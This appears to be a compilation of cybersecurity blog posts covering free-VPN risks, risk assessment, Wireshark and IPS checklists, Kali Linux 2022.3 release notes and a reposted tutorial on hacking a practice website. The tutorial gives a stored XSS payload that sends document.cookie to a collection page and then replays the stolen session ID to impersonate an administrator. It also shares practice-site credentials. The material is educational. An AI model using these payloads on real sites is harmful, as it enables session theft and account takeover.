How much safe your VPN is?

 Well, the answer is...It depends!

You use a reliable VPN to be sure that you remain safe & secure while you browse the internet. When you don't want to be snooped on by government agencies or other companies, then you use a VPN. When you want to access the websites which have been blocked by your government, then you use VPN. When you don't want your ISP to track your online activities, you use VPN.

**VPN is a great tool, but they come with a caveat. **

Not all VPNs are equal. For example, if you are using a free VPN then you might be compromising your security as well as anonymity.
VPNs are used by individuals and the corporates as well by creating a private browsing session for each user.
Suppose you are travelling to a remote area and you need to connect to your company's network. In that case, you might need to connect to public Wi-Fi first. But such public Wi-Fi may let other users of that network to eavesdropping on what you are trying to do online. You should surely use a VPN in situations like this, because a VPN creates a secure tunnel between your computer/laptop and the VPN server which will hide your all online activities and location too.

Indeed, VPN allows you to protect your online privacy, and prevent your ISP to track your online activities. All VPNs work by connecting your device to VPN server and then bypassing your internet traffic through your VPN service provider's internet connection.

This process successfully hides your browsing information...

The very same process does not let any MiTM attacker to gather or monitor your online activities too.
___
 Private Browsing is NOT equal to VPNs.

Though Google Chrome offers you 'InCognito' mode. Microsoft Edge, Firefox offer 'Private Browsing' modes. But you should not make a mistake of assuming that these modes are replacement of a VPN.

These modes may not let data from being stored on your local device or computer. These modes may not save your browsing history, for example. But it does not mean that no one can track you. Of course, your ISP can still track you. The vendors whose plugins are working in such modes, may also track your behavior.

On a side note, Opera does have an inbuilt 'VPN' feature.
___
 Why FREE VPNs may not be safe for you?

1. Free VPN tools can compromise your security.

You may not realize that if you are using some Free VPN service, then the application you are using to connect with VPN server may not be safe. It is very much possible that such apps may contain malware within themselves. Such malware could also be used by cyber-attackers to steal your data, gain unauthorized access to your data or machine, or launch a malicious attack on your system. In 2016, a paper was published on VPN tools' privacy and security issues for Android devices. ICSI Network and Security Group had found that as many as 283 Android VPN apps contained some form of malware presence. So many of these apps were asking for too many of permissions, quite more than they required.

Same can be true of all sort of VPN applications...You need to be watchful here.

**2. Free VPN tools track your online activity. **

The same study found that 72% of Free VPN services were using third-party tracking tools in their software. It means those third-parties were collecting users information and sell it for money to the highest bidders. The objective was to allow targeted advertising to those users by online-advertisers.

A VPN is supposed to protect your activity while you are browsing the internet. But they were doing the opposite by tracking your online activities.

Some free VPN tools totally hide this information about -- whether they share or sell user data, however others service providers may mention this in their privacy policies. A normal user ironically never tends to read their privacy policies.

3. Free VPN tools limit data usage too.

Let us take an example, that you want to watch a movie from Netflix, but it is not available in your country or region, because of any restriction. VPN would let you do that. But in case of using FREE VPNs, they may place some cap or limitation of the amount of data you can use through their tool. This limitation can be daily or monthly. There may be other types of limitations too.

Thus, if you want to protect your data or mask your location for a considerable length of time, then Free VPNs are not for you.

4. Free VPNs slow down users’ internet speed.

They do. I have seen that even paid VPN services succumbing to slow internet speed many a times. They do slow the internet-speed available to you, because ultimate objective is to push you to buy their paid version of the service.

5. Free VPN tools target users with ads.

These services need revenues to sustain their operations. If they cannot charge in case of FREE VPN, then they use direct advertising to boost their revenues. The ads are served to you, without even your permission. Ads not only slow down the internet speed further, they also can distract you from doing some productive work.

The presence of ads on a free VPN service is by default a privacy concern because it is likely the provider is sharing your online activity with third-party services.
___
 The Secure VPNs

Different vendors have different parameters for delivering security to you.
If a VPN provider is ensuring your online privacy, providing transparent privacy policies, fixing data-leaks, and not tracking its users, then you can say that it is a 'safe' VPN.

The whole idea of VPN is to hide your IP address or disguise it. But sometimes, there can be some software bugs or coding errors, that may generate flows which may result in leaking your IP address or location. That's why, when you check online review of customers on internet, you should look for any history of IP-address leakage. If it was there, when it happened, how, or how it was stopped.

There should be ZERO Logging by VPN. They should not collect or log any data you or other users are sharing on such networks. They should not log any log-in credentials, files you have downloaded, website you visited, or your search queries. It is essential to maintain your anonymity. You don't want your VPN tools to have any ability to record or store such information even on your computer. If it does, then a malicious attacker can compromise the application and take out all the information, before it is purged.

You should activate the Multi-factor Authentication (MFA) feature of these VPN applications. This extra security feature is mandatory in modern times of cyber-crimes.
When a malfunction happens, your device using the VPN typically goes back to using its default internet connection. This happens automatically. Worse, this also usually happens without you being aware and your IP address gets leaked with a few seconds.

That's why, you should surely check that your VPN application has a VPN Kill-switch. This feature is important because it will result in automatic exit of specific programs that were using VPN internet connect. This feature comes very handy, when your VPN connection drops due to any reason. Most VPN services include one as part of the client application. When it detects a problem, the kill switch triggers and stop all of your device’s traffic from reaching the internet. It effectively kills your connection.

A VPN from a reliable & trustworthy service-provider should encrypt your data and online browsing history to shield them from hackers and ISPs.

Paid-versions of VPNs usually include ad-blocking tools, as well as features like malware protection and unlimited bandwidth, which keep your data secure.

Why is cyber security risk assessment so important?

 

A cyber security risk assessment is the process of identifying, analysing and evaluating risk. It helps to ensure that the cyber security controls you choose are appropriate to the risks your organisation faces.

Risk assessment is a process that includes:

* Identifying vulnerabilities, threats, and risks that can cause any
sort of damage to the organization
* Estimating the probability of risks being realized
* Defining mitigation priorities by risk severity and the likelihood
of occurrence

In risk management, assessment is preceded by framing (establishing the context of risks) and followed by responding to and monitoring these risks.

Without a risk assessment to inform your cyber security choices, you could waste time, effort and resources. There is little point implementing measures to defend against events that are unlikely to occur or won’t impact your organisation.

Likewise, you might underestimate or overlook risks that could cause significant damage. This is why so many best-practice frameworks, standards and laws – including the GDPR (General Data Protection Regulation) and DPA (Data Protection Act) 2018 – require risk assessments to be conducted.

Please understand very clearly that it is an ongoing process that helps you evaluate your security controls, detect issues, and estimate their impact.

5-Major Reasons For Conducting An Cyber/IT Risk Assessment:

1. To prevent hacks, data breaches, and data loss. A periodic review of cybersecurity controls allows you to detect and close off vulnerabilities before hackers can exploit them.

2. To examine network security. An independent risk assessment provides an unbiased examination of your network’s security controls. It helps you update knowledge on your protected environment, especially after significant changes like deploying new software, installing new hardware, or moving to a new location.

3. To improve decision-making. Determining the impact of discovered risks is an important part of a risk assessment. This information is useful for making further decisions related to cybersecurity: budgeting, planning improvements, prioritizing fixes, etc.

4. To reduce spending on cybersecurity. An assessment is a time- and cost-consuming procedure. But in the long term, it can save you from more severe losses by preventing data breaches, hacks, and compliance violations.

5. To ensure compliance. Risk management is part of many laws, regulations, and standards including NIST Special Publications, HIPAA, PCI DSS, and GDPR. Failing to comply with those that are relevant to your business may lead to substantial fines.

A REVIEW CHECKLIST FOR NETWORK SECURITY ANALYSIS

 

All network analyzers/sniffers have the ability to capture data from network. But most of them only do some simple statistics then throw pages of numbers to the users. Especially in a big network with heavy traffic, network administrators have to figure out a network problem even a simple one.

The Security Analysis is a perfect example. The Security Analysis is an analysis profile which has the power to detect the following network anomalies and attacks:

* ARP attack
* Worm activity
* DoS attack
* TCP port scanning
* Suspicious conversation

Review a Checklist of Analysis Tasks

There are a large number of tasks which a Security Analyst should perform. These tasks can be considered proactive or reactive.
Proactive methods include BASELINING network communications to learn the current status of the network and application performance. It can also be used to spot network problems before they are felt by the network users.

For example, identifying the cause of packet loss before it becomes excessive and affects network communications helps avoid problems before they are even noticed.

Reactive analysis techniques are employed after a complaint about network performance has been reported or when network issues are suspected. Sadly, reactive analysis is more common.
The following lists some of the analysis tasks that can be performed using Wireshark:

@@ Find the top talkers on the network
@@ Identify the protocols and applications in use
@@ Determine the average packets per second rate and bytes per second rate of an application or all network traffic on a link
@@ List all hosts communicating
@@ Learn the packet lengths used by a data transfer application
@@ Recognize the most common connection problems
@@ Spot delays between client requests due to slow processing
@@ Locate misconfigured hosts
@@ Detect network or host congestion that is slowing down file transfers
@@ Identify asynchronous traffic prioritization
@@ Graph HTTP flows to examine website referrals rates
@@ Identify unusual scanning traffic on the network
@@ Quickly identify HTTP error responses indicating client and server problems
@@ Quickly identify VoIP error responses indicating client, server or global errors
@@ Build graphs to compare traffic behavior
@@ Graph application throughput and compare to overall link traffic seen
@@ Identify applications that do not encrypt traffic
@@ Play back VoIP conversations to hear the effects of various network problems on network traffic
@@ Perform passive operating system and application use detection
@@ Spot unusual protocols and unrecognized port number usage on the network
@@ Examine the startup process of hosts and applications on the network
@@ Identify average and unacceptable service response times (SRT)
@@ Graph intervals of periodic packet generation applications or protocols

Networks vary greatly in the traffic seen. The number and type of network analysis tasks you can perform depends on your network traffic characteristics.

Deploying Sensors for Intrusion Prevention Systems (IPS)

 

Today, I am sharing the crux of that discussion with you…
Technical factors to consider when selecting sensors for deployment in an organization include the following:

~~ The network media in use
~~ The performance of the sensor
~~ The overall network design
~~ The IPS design (Will the sensor analyze and protect many systems or just a few?)
~~ Virtualization (Will multiple virtual sensors be created in the sensor?)

Important issues to keep in mind in an IPS design include the following:

1. Your network topology:
Size and complexity, connections, and the amount and type of traffic.

2. Sensor placement:
It is recommended that these be placed at those entry and exit points that provide sufficient IPS coverage.

3. Your management and monitoring options:
The number of sensors often dictates the level of management you need.

Locations that generally need to be protected include the following:

* Internet: Sensor between your perimeter gateway and the Internet
* Extranet: Between your network and extranet connection
* Internal: Between internal data centers
* Remote access: Hardens perimeter control
* Server farm: Network IPS at the perimeter and host IPS on the servers

-

Please let me know of what do you think about this in the comment section. You can also share with all if the information shared here helps you in some manner.

TYPES OF CYBER ATTACKS

 

@ Malware

Software programs designed to damage or do unwanted actions on a computer. Common examples include: viruses, worms, trojan horses, spyware, and ransomware.

@ Phishing

Attacks sent via email and ask users to click on a link and enter their personal data. They include a link that directs the user to a dummy site that will steal a user’s information.

@ Password Attacks

Involves a third party trying to gain access to your systems by solving a user’s password.

@ Denial of Service Attacks (DoS or DDoS)

Attackers send high volumes of data or traffic through the network until the network becomes overloaded and can no longer function

@ Man in the Middle (MITM)

Information is obtained from the end user and the entity the user is communicating with by impersonating the endpoints in an online information exchange (i.e. connection from smartphone to website).

@ Drive-by Downloads

A program is downloaded to a user’s system just by visiting the site. It doesn’t require any type of action by the user to download.

@ Malversating

Malversating ("malicious advertising") is the use of online advertising to spread malware. It typically involves injecting malicious or malware-laden advertisements into legitimate online advertising networks and webpages.

@ Rogue Software's

Rogue security software is a form of malicious software and internet fraud that misleads users into believing there is a virus on their computer and aims to convince them to pay for a fake malware removal tool that actually installs malware on their computer. It is a form of scareware that manipulates users through fear, and a form of ransomware

-

Kali Linux 2022.3 – Added Bruteshark And Test Lab Environment

 

Offensive Security has released Kali Linux 2022.3 with major updates.

It is a popular platform for ethical hackers and penetration testers, and an operating system for identifying vulnerabilities within a network.

Previously in Kali Linux 2022.2 version were added 10 tools.

Kali’s 2022.3’s Release Highlights:

• Discord Server – Kali’s new community real-time chat option has launched!
• Test Lab Environment – Quickly create a test bed to learn, practice, and benchmark tools and compare their results
• Opening Kali-Tools Repo – We have opened up the Kali tools repository and are accepting your submissions!
• Help Wanted – We are looking for a Go developer to help us on an open-source project
• Kali NetHunter Updates – New releases in our NetHunter store
• Virtual Machines Updates – New VirtualBox image format, weekly images, and build-scripts to build your own

Other Kali updates

• For people who use Xrdp (like Win-KeX), there is a new look to the login
• Fixed up some confusion between fuse and fuse3
• Some maintenance to our network repository, and shrank /kali from 1.7Tb to 520Gb!

New Tools Added –

Kali Linux would not be a release without some new tools!

A quick run down of what has been added (to the network repositories):

• BruteShark – Network Analysis Tool
• DefectDojo – Open-source application vulnerability correlation and security orchestration tool
• phpsploit – Stealth post-exploitation framework
• shellfire – Exploiting LFI/RFI and command injection vulnerabilities
• SprayingToolkit – Password spraying attacks against Lync/S4B, OWA and O365

There have been numerous packages updates as well.

Kali NetHunter Updates

Full Android 12 support is getting closer to being a reality with 6 new kernels in our NetHunter repository and updates to the NetHunter app.

It is still not for the fainthearted as a little tinkering is required to install all the components individually but we’re getting closer to releasing the first OnePlus image soon.

For the meantime, we have updated the apps in our NetHunter Store to the latest releases, including:

• aRDP, aSPICE, bVNC, Opaque = v5.1.0
• Connectbot = 1.9.8-oss
• Intercepter-NG = 2.8
• OONI Probe = 3.7.0
• OpenVPN = 0.7.38
• Orbot = 16.4.1-RC-2-tor.0.4.4.6
• SnoopSnitch = 2.0.12-nbc
• Termux = 118
• Termux-API = 51
• Termux-Styling = 29
• Termux-Tasker = 6
• Termux-Widget = 13
• Termux-Float = 15
• WiGLE WiFi Wardriving = 2.64

If you would like to get involved and help out with the development, or just like to chat to like-minded Android tinkerers, why don’t you join us in the NetHunter channels on our new Discord server? We’d love to see you around!

Existing Installs:

If you already have an existing Kali Linux installation, remember you can always do a quick update:

┌──(kali㉿kali)-[~] └─$ echo “deb http://http.kali.org/kali kali-rolling main non-free contrib” | sudo tee /etc/apt/sources.list

┌──(kali㉿kali)-[~] └─$ sudo apt update && sudo apt -y full-upgrade

┌──(kali㉿kali)-[~] └─$ cp -rbi /etc/skel/. ~

┌──(kali㉿kali)-[~] └─$ [ -f /var/run/reboot-required ] && sudo reboot -f
You should now be on Kali Linux 2022.3 We can do a quick check by doing:

┌──(kali㉿kali)-[~] └─$ grep VERSION /etc/os-release
VERSION=”2022.3″
VERSION_ID=”2022.3″
VERSION_CODENAME=”kali-rolling”

┌──(kali㉿kali)-[~] └─$ uname -v
#1 SMP PREEMPT_DYNAMIC Debian 5.18.5-1kali6 (2022-07-07)

┌──(kali㉿kali)-[~] └─$ uname -r
5.18.0-kali5-amd64
NOTE: The output of uname -r may be different depending on the system

Kali Linux 2022.3 Download

How to Hack a Website: Hacking Websites Online Example

More people have access to the internet than ever before. This has prompted many organizations to develop web-based applications that users can use online to interact with the organization. Poorly written code for web applications can be exploited to gain unauthorized access to sensitive data and web servers. In this tutorial you will learn how to hack websites, and we will introduce you to web application hacking techniques and the counter measures you can put in place to protect against such attacks.

What is a web application? What are Web Threats?

A web application (aka website) is an application based on the client-server model. The server provides the database access and the business logic. It is hosted on a web server. The client application runs on the client web browser. Web applications are usually written in languages such as Java, C#, and VB.Net, PHP, ColdFusion Markup Language, etc. the database engines used in web applications include MySQL, MS SQL Server, PostgreSQL, SQLite, etc.

Most web applications are hosted on public servers accessible via the Internet. This makes them vulnerable to attacks due to easy accessibility. The following are common web application threats.

• SQL Injection – the goal of this threat could be to bypass login algorithms, sabotage the data, etc.
• Denial of Service Attacks– the goal of this threat could be to deny legitimate users access to the resource
• Cross Site Scripting XSS– the goal of this threat could be to inject code that can be executed on the client side browser.
• Cookie/Session Poisoning– the goal of this threat is to modify cookies/session data by an attacker to gain unauthorized access.
• Form Tampering – the goal of this threat is to modify form data such as prices in e-commerce applications so that the attacker can get items at reduced prices.
• Code Injection – the goal of this threat is to inject code such as PHP, Python, etc. that can be executed on the server. The code can install backdoors, reveal sensitive information, etc.
• Defacement– the goal of this threat is to modify the page been displayed on a website and redirecting all page requests to a single page that contains the attacker’s message.

How to protect your Website against hacks?

An organization can adopt the following policy to protect itself against web server attacks.

• SQL Injection– sanitizing and validating user parameters before submitting them to the database for processing can help reduce the chances of been attacked via SQL Injection. Database engines such as MS SQL Server, MySQL, etc. support parameters, and prepared statements. They are much safer than traditional SQL statements
• Denial of Service Attacks – firewalls can be used to drop traffic from suspicious IP address if the attack is a simple DoS. Proper configuration of networks and Intrusion Detection System can also help reduce the chances of a DoS attack been successful.
• Cross Site Scripting – validating and sanitizing headers, parameters passed via the URL, form parameters and hidden values can help reduce XSS attacks.
• Cookie/Session Poisoning– this can be prevented by encrypting the contents of the cookies, timing out the cookies after some time, associating the cookies with the client IP address that was used to create them.
• Form tempering – this can be prevented by validating and verifying the user input before processing it.
• Code Injection – this can be prevented by treating all parameters as data rather than executable code. Sanitization and Validation can be used to implement this.
• Defacement – a good web application development security policy should ensure that it seals the commonly used vulnerabilities to access the web server. This can be a proper configuration of the operating system, web server software, and best security practices when developing web applications.

Website hacking tricks: Hack a Website online

In this website hacking practical scenario, we are going to hijack the user session of the web application located at www.techpanda.org. We will use cross site scripting to read the cookie session id then use it to impersonate a legitimate user session.

The assumption made is that the attacker has access to the web application and he would like to hijack the sessions of other users that use the same application. The goal of this attack could be to gain admin access to the web application assuming the attacker’s access account is a limited one.

Getting started

• Open http://www.techpanda.org/
• For practice purposes, it is strongly recommended to gain access using SQL Injection. Refer to this article for more information on how to do that.
• The login email is admin@google.com, the password is Password2010
• If you have logged in successfully, then you will get the following dashboard

• Click on Add New Contact
• Enter the following as the first name

<a href=# onclick=\”document.location=\’http://techpanda.org/snatch_sess_id.php?c=\’+escape\(document.cookie\)\;\”>Dark</a>

HERE,

The above code uses JavaScript. It adds a hyperlink with an onclick event. When the unsuspecting user clicks the link, the event retrieves the PHP cookie session ID and sends it to the snatch_sess_id.php page together with the session id in the URL

• Enter the remaining details as shown below
• Click on Save Changes

• Your dashboard will now look like the following screen

• Since the cross site script code is stored in the database, it will be loaded everytime the users with access rights login
• Let’s suppose the administrator logins and clicks on the hyperlink that says Dark
• He/she will get the window with the session id showing in the URL

Note: the script could be sending the value to some remote server where the PHPSESSID is stored then the user redirected back to the website as if nothing happened.

Note: the value you get may be different from the one in this webpage hacking tutorial, but the concept is the same

session Impersonation using Firefox and Tamper Data add-on

The flowchart below shows the steps that you must take to complete this exercise.

• You will need Firefox web browser for this section and Tamper Data add-on
• Open Firefox and install the add as shown in the diagrams below

• Search for tamper data then click on install as shown above

• Click on Accept and Install…

• Click on Restart now when the installation completes
• Enable the menu bar in Firefox if it is not shown

• Click on tools menu then select Tamper Data as shown below

• You will get the following Window. Note: If the Windows is not empty, hit the clear button

• Click on Start Tamper menu
• Switch back to Firefox web browser, type http://www.techpanda.org/dashboard.php then press the enter key to load the page
• You will get the following pop up from Tamper Data

• The pop-up window has three (3) options. The Tamper option allows you to modify the HTTP header information before it is submitted to the server.
• Click on it
• You will get the following window

• Copy the PHP session ID you copied from the attack URL and paste it after the equal sign. Your value should now look like this

PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2

• Click on OK button
• You will get the Tamper data popup window again

• Uncheck the checkbox that asks Continue Tampering?
• Click on submit button when done
• You should be able to see the dashboard as shown below

Note: we did not login, we impersonated a login session using the PHPSESSID value we retrieved using cross site scripting

Summary

• A web application is based on the server-client model. The client side uses the web browser to access the resources on the server.
• Web applications are usually accessible over the internet. This makes them vulnerable to attacks.
• Web application threats include SQL Injection, Code Injection, XSS, Defacement, Cookie poisoning, etc.
• A good security policy when developing web applications can help make them secure.

Guru99 is Sponsored by Invicti